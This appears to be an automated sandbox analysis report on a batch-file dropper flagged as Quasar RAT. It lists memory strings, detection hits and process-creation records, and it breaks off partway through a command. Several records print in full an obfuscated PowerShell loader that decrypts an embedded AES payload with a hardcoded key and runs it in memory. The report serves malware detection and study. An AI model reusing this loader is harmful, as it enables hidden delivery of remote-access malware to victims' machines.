Source: lsass.exe, 0000000E.00000000.3233208541.000002AFF4CD0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3269452554.000002AFF4CD0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: lsass.exe, 0000000E.00000000.3227767943.000002AFF4C2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3267251434.000002AFF4C2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
Source: lsass.exe, 0000000E.00000000.3228931536.000002AFF4C50000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3267694235.000002AFF4C50000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
Source: lsass.exe, 0000000E.00000000.3227767943.000002AFF4C2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3267251434.000002AFF4C2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: svchost.exe, 00000016.00000000.3908512342.0000027F00400000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-saml-token-profile-1.0#SAMLAssertionID
Source: Uni.bat.exe, 00000003.00000003.2302030138.0000019D15494000.00000004.00000800.00020000.00000000.sdmp, $sxr-seroxen.bat.exe, 0000000A.00000003.2657861993.000001B3AF753000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: lsass.exe, 0000000E.00000000.3273574517.000002AFF54BB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3277535735.000002AFF5C33000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3276936482.000002AFF5C00000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3249570666.000002AFF5C00000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3240948457.000002AFF54BB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3250771899.000002AFF5C33000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3229834280.000002AFF4C6C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3268056055.000002AFF4C6C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: lsass.exe, 0000000E.00000000.3273574517.000002AFF54BB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3277535735.000002AFF5C33000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3240948457.000002AFF54BB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3250771899.000002AFF5C33000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0:
Source: lsass.exe, 0000000E.00000000.3273574517.000002AFF54BB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3254486063.000002AFF5CE6000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3279353165.000002AFF5CE6000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3242147308.000002AFF54E8000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3274047175.000002AFF54E8000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3240948457.000002AFF54BB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3229834280.000002AFF4C6C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3268056055.000002AFF4C6C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0H
Source: lsass.exe, 0000000E.00000000.3273574517.000002AFF54BB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3230944309.000002AFF4C85000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3238773086.000002AFF546E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3272680945.000002AFF546E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3240948457.000002AFF54BB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0I
Source: lsass.exe, 0000000E.00000000.3273574517.000002AFF54BB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3277535735.000002AFF5C33000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3240948457.000002AFF54BB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3250771899.000002AFF5C33000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3229834280.000002AFF4C6C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3268056055.000002AFF4C6C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.msocsp.com0
Source: $sxr-seroxen.bat.exe, 0000000A.00000003.2629623775.000001B39B5B9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: Uni.bat.exe, 00000003.00000002.2429957465.0000019D0022C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.pngXz
Source: Uni.bat.exe, 00000003.00000003.2288884621.0000019D012F9000.00000004.00000800.00020000.00000000.sdmp, Uni.bat.exe, 00000003.00000003.2288592445.0000019D012CD000.00000004.00000800.00020000.00000000.sdmp, $sxr-seroxen.bat.exe, 0000000A.00000003.2628798991.000001B39B58E000.00000004.00000800.00020000.00000000.sdmp, $sxr-seroxen.bat.exe, 0000000A.00000003.2629623775.000001B39B5B9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.pngh
Source: svchost.exe, 00000016.00000000.3816695809.0000027F00834000.00000004.00000001.00020000.00000000.sdmp, Microsoft-Windows-Bits-Client%4Operational.evtx.22.dr String found in binary or memory: http://r4---sn-5hnekn7k.gvt1.com/edgedl/release2/chrome/acb3kitere6jimdp6rrtasanb2aq_93.0.4577.82/93
Source: svchost.exe, 00000016.00000000.3816695809.0000027F00834000.00000004.00000001.00020000.00000000.sdmp, Microsoft-Windows-Bits-Client%4Operational.evtx.22.dr String found in binary or memory: http://redirector.gvt1.com/edgedl/release2/chrome/acb3kitere6jimdp6rrtasanb2aq_93.0.4577.82/93.0.457
Source: lsass.exe, 0000000E.00000000.3236515930.000002AFF5416000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.microsof
Source: lsass.exe, 0000000E.00000000.3228931536.000002AFF4C50000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3267694235.000002AFF4C50000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3227767943.000002AFF4C2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3267251434.000002AFF4C2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
Source: lsass.exe, 0000000E.00000000.3228931536.000002AFF4C50000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3267694235.000002AFF4C50000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: svchost.exe, 00000016.00000000.3908512342.0000027F00400000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
Source: Uni.bat.exe, 00000003.00000002.2424319713.0000019D00001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: lsass.exe, 0000000E.00000000.3228931536.000002AFF4C50000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3267694235.000002AFF4C50000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3227767943.000002AFF4C2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3267251434.000002AFF4C2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
Source: lsass.exe, 0000000E.00000000.3227767943.000002AFF4C2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3267251434.000002AFF4C2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: lsass.exe, 0000000E.00000000.3227767943.000002AFF4C2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3267251434.000002AFF4C2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties
Source: lsass.exe, 0000000E.00000000.3227767943.000002AFF4C2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3267251434.000002AFF4C2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
Source: Uni.bat.exe, 00000003.00000003.2276660289.0000019D00B58000.00000004.00000800.00020000.00000000.sdmp, $sxr-seroxen.bat.exe, 0000000A.00000003.2595259954.000001B39AE18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: $sxr-seroxen.bat.exe, 0000000A.00000003.2629623775.000001B39B5B9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Uni.bat.exe, 00000003.00000002.2429957465.0000019D0022C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXz
Source: Uni.bat.exe, 00000003.00000003.2288884621.0000019D012F9000.00000004.00000800.00020000.00000000.sdmp, Uni.bat.exe, 00000003.00000003.2288592445.0000019D012CD000.00000004.00000800.00020000.00000000.sdmp, $sxr-seroxen.bat.exe, 0000000A.00000003.2628798991.000001B39B58E000.00000004.00000800.00020000.00000000.sdmp, $sxr-seroxen.bat.exe, 0000000A.00000003.2629623775.000001B39B5B9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlh
Source: lsass.exe, 0000000E.00000000.3273574517.000002AFF54BB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3230944309.000002AFF4C85000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3238773086.000002AFF546E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3272680945.000002AFF546E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3240948457.000002AFF54BB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com/CPS0
Source: lsass.exe, 0000000E.00000000.3273574517.000002AFF54BB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3254486063.000002AFF5CE6000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3279353165.000002AFF5CE6000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3242147308.000002AFF54E8000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3274047175.000002AFF54E8000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3240948457.000002AFF54BB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3229834280.000002AFF4C6C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3268056055.000002AFF4C6C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com/CPS0~
Source: svchost.exe, 00000021.00000000.4258432650.00000192F653D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: Uni.bat.exe, 00000003.00000002.2424319713.0000019D00001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: $sxr-seroxen.bat.exe, 0000000A.00000003.2657861993.000001B3AF753000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: $sxr-seroxen.bat.exe, 0000000A.00000003.2657861993.000001B3AF753000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: $sxr-seroxen.bat.exe, 0000000A.00000003.2657861993.000001B3AF753000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: svchost.exe, 00000027.00000000.4544743676.000001F89D580000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000027.00000000.4475659091.000001F89D580000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://excel.office.comSRD1%
Source: svchost.exe, 00000016.00000000.3915856598.0000027F00844000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000000.3924723112.0000027F7DCA0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000000.3828541817.0000027F7DCA0000.00000004.00000001.00020000.00000000.sdmp, Application.evtx.22.dr String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/windows-default-browser-ag
Source: Microsoft-Windows-Bits-Client%4Operational.evtx.22.dr String found in binary or memory: https://g.live.com/odclientsettings/Prod
Source: Microsoft-Windows-Bits-Client%4Operational.evtx.22.dr String found in binary or memory: https://g.live.com/odclientsettings/ProdC:
Source: $sxr-seroxen.bat.exe, 0000000A.00000003.2629623775.000001B39B5B9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: Uni.bat.exe, 00000003.00000002.2429957465.0000019D0022C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/PesterXz
Source: Uni.bat.exe, 00000003.00000003.2288884621.0000019D012F9000.00000004.00000800.00020000.00000000.sdmp, Uni.bat.exe, 00000003.00000003.2288592445.0000019D012CD000.00000004.00000800.00020000.00000000.sdmp, $sxr-seroxen.bat.exe, 0000000A.00000003.2628798991.000001B39B58E000.00000004.00000800.00020000.00000000.sdmp, $sxr-seroxen.bat.exe, 0000000A.00000003.2629623775.000001B39B5B9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pesterh
Source: $sxr-seroxen.bat.exe, 0000000A.00000003.3082027574.000001B3B21E8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/dahall/taskscheduler
Source: $sxr-seroxen.bat.exe, 0000000A.00000003.2595259954.000001B39AE18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oneget.org
Source: svchost.exe, 00000027.00000000.4496875841.000001F89D8E7000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000027.00000000.4544743676.000001F89D580000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000027.00000000.4475659091.000001F89D580000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://outlook.comSRD1-
Source: svchost.exe, 00000027.00000000.4544743676.000001F89D580000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000027.00000000.4475659091.000001F89D580000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://powerpoint.office.comSRD13
Source: svchost.exe, 00000027.00000000.4544743676.000001F89D580000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000027.00000000.4526222801.000001F89E14F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000027.00000000.4475659091.000001F89D580000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://word.office.comSRD1#
Source: svchost.exe, 00000027.00000000.4552677551.000001F89DA84000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/pwaimages

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Installs a global keyboard hook
Source: C:\Windows\$sxr-seroxen.bat.exe Windows user hook set: 0 keyboard low level C:\Windows\$sxr-seroxen.bat.exe Jump to behavior

E-Banking Fraud
barindex
Yara detected Quasar RAT
Source: Yara match File source: 00000003.00000002.2429957465.0000019D0022C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Uni.bat.exe PID: 5268, type: MEMORYSTR
Yara signature match
Source: 00000016.00000000.3799566429.0000027F0047B000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, score = file, reference = https://goo.gl/uAic1X, modified = 2022-09-15
Source: 00000016.00000000.3801933554.0000027F004C8000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, score = file, reference = https://goo.gl/uAic1X, modified = 2022-09-15
Source: 00000016.00000000.3910163990.0000027F004C8000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, score = file, reference = https://goo.gl/uAic1X, modified = 2022-09-15
Source: 00000016.00000000.3917415113.0000027F00902000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, score = file, reference = https://goo.gl/uAic1X, modified = 2022-09-15
Source: 00000016.00000000.3821072411.0000027F00902000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, score = file, reference = https://goo.gl/uAic1X, modified = 2022-09-15
Source: C:\Windows\System32\winevt\Logs\Windows PowerShell.evtx, type: DROPPED Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, score = file, reference = https://goo.gl/uAic1X, modified = 2022-09-15
Creates files inside the system directory
Source: C:\Users\user\Desktop\Uni.bat.exe File created: C:\Windows\$sxr-seroxen.bat Jump to behavior
Detected potential crypto function
Source: C:\Windows\System32\dllhost.exe Code function: 5_2_00000001400A83E0 5_2_00000001400A83E0
Source: C:\Windows\System32\dllhost.exe Code function: 5_2_00000001400A8CC0 5_2_00000001400A8CC0
Source: C:\Windows\System32\dllhost.exe Code function: 5_2_00000001400A96B0 5_2_00000001400A96B0
Source: C:\Windows\System32\dllhost.exe Code function: 5_2_0000000140067FC3 5_2_0000000140067FC3
Source: C:\Windows\System32\dllhost.exe Code function: 5_2_00000001400AA1A0 5_2_00000001400AA1A0
Source: C:\Windows\System32\dllhost.exe Code function: 5_2_00000001400AA850 5_2_00000001400AA850
Source: C:\Windows\System32\dllhost.exe Code function: 5_2_0000000140069ADF 5_2_0000000140069ADF
Source: C:\Windows\System32\dllhost.exe Code function: 5_2_0000000140068ED7 5_2_0000000140068ED7
Source: C:\Windows\System32\dllhost.exe Code function: 5_2_0000000140077060 5_2_0000000140077060
Source: C:\Windows\System32\dllhost.exe Code function: 5_2_000000014012B6D0 5_2_000000014012B6D0
Source: C:\Windows\System32\dllhost.exe Code function: 5_2_00000001400779D0 5_2_00000001400779D0
Source: C:\Windows\System32\dllhost.exe Code function: 5_2_00000001400A7A00 5_2_00000001400A7A00
Source: C:\Windows\System32\dllhost.exe Code function: 5_2_00000001400A7F30 5_2_00000001400A7F30
Source: C:\Windows\System32\dllhost.exe Code function: 11_2_00000001400A83E0 11_2_00000001400A83E0
Source: C:\Windows\System32\dllhost.exe Code function: 11_2_00000001400A8CC0 11_2_00000001400A8CC0
Source: C:\Windows\System32\dllhost.exe Code function: 11_2_00000001400A96B0 11_2_00000001400A96B0
Source: C:\Windows\System32\dllhost.exe Code function: 11_2_0000000140067FC3 11_2_0000000140067FC3
Source: C:\Windows\System32\dllhost.exe Code function: 11_2_00000001400AA1A0 11_2_00000001400AA1A0
Source: C:\Windows\System32\dllhost.exe Code function: 11_2_00000001400AA850 11_2_00000001400AA850
Source: C:\Windows\System32\dllhost.exe Code function: 11_2_0000000140069ADF 11_2_0000000140069ADF
Source: C:\Windows\System32\dllhost.exe Code function: 11_2_0000000140068ED7 11_2_0000000140068ED7
Source: C:\Windows\System32\dllhost.exe Code function: 11_2_0000000140077060 11_2_0000000140077060
Source: C:\Windows\System32\dllhost.exe Code function: 11_2_000000014012B6D0 11_2_000000014012B6D0
Source: C:\Windows\System32\dllhost.exe Code function: 11_2_00000001400779D0 11_2_00000001400779D0
Source: C:\Windows\System32\dllhost.exe Code function: 11_2_00000001400A7A00 11_2_00000001400A7A00
Source: C:\Windows\System32\dllhost.exe Code function: 11_2_00000001400A7F30 11_2_00000001400A7F30
Found potential string decryption / allocating functions
Source: C:\Windows\System32\dllhost.exe Code function: String function: 0000000140067573 appears 828 times
Source: C:\Windows\System32\dllhost.exe Code function: String function: 00000001400697F6 appears 230 times
Source: C:\Windows\System32\dllhost.exe Code function: String function: 00000001400F6400 appears 48 times
Source: C:\Windows\System32\dllhost.exe Code function: String function: 0000000140069A67 appears 696 times
Source: C:\Windows\System32\dllhost.exe Code function: String function: 000000014006839C appears 138 times
Source: C:\Windows\System32\dllhost.exe Code function: String function: 0000000140067AC3 appears 36 times
Sample file is different than original file name gathered from version info
Source: Uni.bat.exe, 00000003.00000002.2425692752.0000019D0008A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFileName vs Uni.bat
Source: Uni.bat.exe, 00000003.00000002.2424319713.0000019D00001000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs Uni.bat
Source: Uni.bat.exe, 00000003.00000000.2252991285.00007FF640F89000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamePowerShell.EXEj% vs Uni.bat
Source: Uni.bat.exe, 00000003.00000002.2429957465.0000019D0022C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename$sxr-seroxen: vs Uni.bat
Source: Uni.bat.exe, 00000003.00000002.2497057533.0000019D10546000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameInstallStager.exe4 vs Uni.bat
Source: Uni.bat.exe, 00000003.00000002.2446420577.0000019D007DC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenametmp1B81.tmp4 vs Uni.bat
Source: Uni.bat.exe.0.dr Binary or memory string: OriginalFilenamePowerShell.EXEj% vs Uni.bat
Tries to load missing DLLs
Source: C:\Users\user\Desktop\Uni.bat.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\System32\dllhost.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\System32\dllhost.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\System32\dllhost.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Users\user\Desktop\Uni.bat.exe File read: C:\Users\user\Desktop\Uni.bat Jump to behavior
Source: C:\Users\user\Desktop\Uni.bat.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Uni.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\Desktop\Uni.bat.exe "Uni.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $dTvqc = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\Desktop\Uni.bat').Split([Environment]::NewLine);foreach ($xWedX in $dTvqc) { if ($xWedX.StartsWith(':: ')) { $IIMux = $xWedX.Substring(3); break; }; };$sruNp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($IIMux);$lrCpk = New-Object System.Security.Cryptography.AesManaged;$lrCpk.Mode = [System.Security.Cryptography.CipherMode]::CBC;$lrCpk.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$lrCpk.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WjKBU6kw+D26wh+8C8AVNw88e4KNe0j8V15CylIW9B8=');$lrCpk.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ncm0BfWz0RHt+QRojgON8Q==');$SCKKz = $lrCpk.CreateDecryptor();$sruNp = $SCKKz.TransformFinalBlock($sruNp, 0, $sruNp.Length);$SCKKz.Dispose();$lrCpk.Dispose();$fPStr = New-Object System.IO.MemoryStream(, $sruNp);$DsNJO = New-Object System.IO.MemoryStream;$vIclt = New-Object System.IO.Compression.GZipStream($fPStr, [IO.Compression.CompressionMode]::Decompress);$vIclt.CopyTo($DsNJO);$vIclt.Dispose();$fPStr.Dispose();$DsNJO.Dispose();$sruNp = $DsNJO.ToArray();$DjUff = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($sruNp);$DFfIo = $DjUff.EntryPoint;$DFfIo.Invoke($null, (, [string[]] ('')))
Source: C:\Users\user\Desktop\Uni.bat.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{d6e02c51-9612-4091-b0a3-037f24ee9b79}
Source: C:\Users\user\Desktop\Uni.bat.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C cd C:\Windows\ & $sxr-seroxen.bat
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\$sxr-seroxen.bat.exe "$sxr-seroxen.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $dTvqc = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Windows\$sxr-seroxen.bat').Split([Environment]::NewLine);foreach ($xWedX in $dTvqc) { if ($xWedX.StartsWith(':: ')) { $IIMux = $xWedX.Substring(3); break; }; };$sruNp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($IIMux);$lrCpk = New-Object System.Security.Cryptography.AesManaged;$lrCpk.Mode = [System.Security.Cryptography.CipherMode]::CBC;$lrCpk.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$lrCpk.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WjKBU6kw+D26wh+8C8AVNw88e4KNe0j8V15CylIW9B8=');$lrCpk.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ncm0BfWz0RHt+QRojgON8Q==');$SCKKz = $lrCpk.CreateDecryptor();$sruNp = $SCKKz.TransformFinalBlock($sruNp, 0, $sruNp.Length);$SCKKz.Dispose();$lrCpk.Dispose();$fPStr = New-Object System.IO.MemoryStream(, $sruNp);$DsNJO = New-Object System.IO.MemoryStream;$vIclt = New-Object System.IO.Compression.GZipStream($fPStr, [IO.Compression.CompressionMode]::Decompress);$vIclt.CopyTo($DsNJO);$vIclt.Dispose();$fPStr.Dispose();$DsNJO.Dispose();$sruNp = $DsNJO.ToArray();$DjUff = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($sruNp);$DFfIo = $DjUff.EntryPoint;$DFfIo.Invoke($null, (, [string[]] ('')))
Source: C:\Windows\$sxr-seroxen.bat.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{13e478b5-f900-4cff-9b71-2eeec68eb126}
Source: C:\Windows\$sxr-seroxen.bat.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{990e3f84-620e-4699-897b-705569b7aedb}
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\Desktop\Uni.bat.exe "Uni.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $dTvqc = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\Desktop\Uni.bat').Split([Environment]::NewLine);foreach ($xWedX in $dTvqc) { if ($xWedX.StartsWith(':: ')) { $IIMux = $xWedX.Substring(3); break; }; };$sruNp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($IIMux);$lrCpk = New-Object System.Security.Cryptography.AesManaged;$lrCpk.Mode = [System.Security.Cryptography.CipherMode]::CBC;$lrCpk.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$lrCpk.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WjKBU6kw+D26wh+8C8AVNw88e4KNe0j8V15CylIW9B8=');$lrCpk.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ncm0BfWz0RHt+QRojgON8Q==');$SCKKz = $lrCpk.CreateDecryptor();$sruNp = $SCKKz.TransformFinalBlock($sruNp, 0, $sruNp.Length);$SCKKz.Dispose();$lrCpk.Dispose();$fPStr = New-Object System.IO.MemoryStream(, $sruNp);$DsNJO = New-Object System.IO.MemoryStream;$vIclt = New-Object System.IO.Compression.GZipStream($fPStr, [IO.Compression.CompressionMode]::Decompress);$vIclt.CopyTo($DsNJO);$vIclt.Dispose();$fPStr.Dispose();$DsNJO.Dispose();$sruNp = 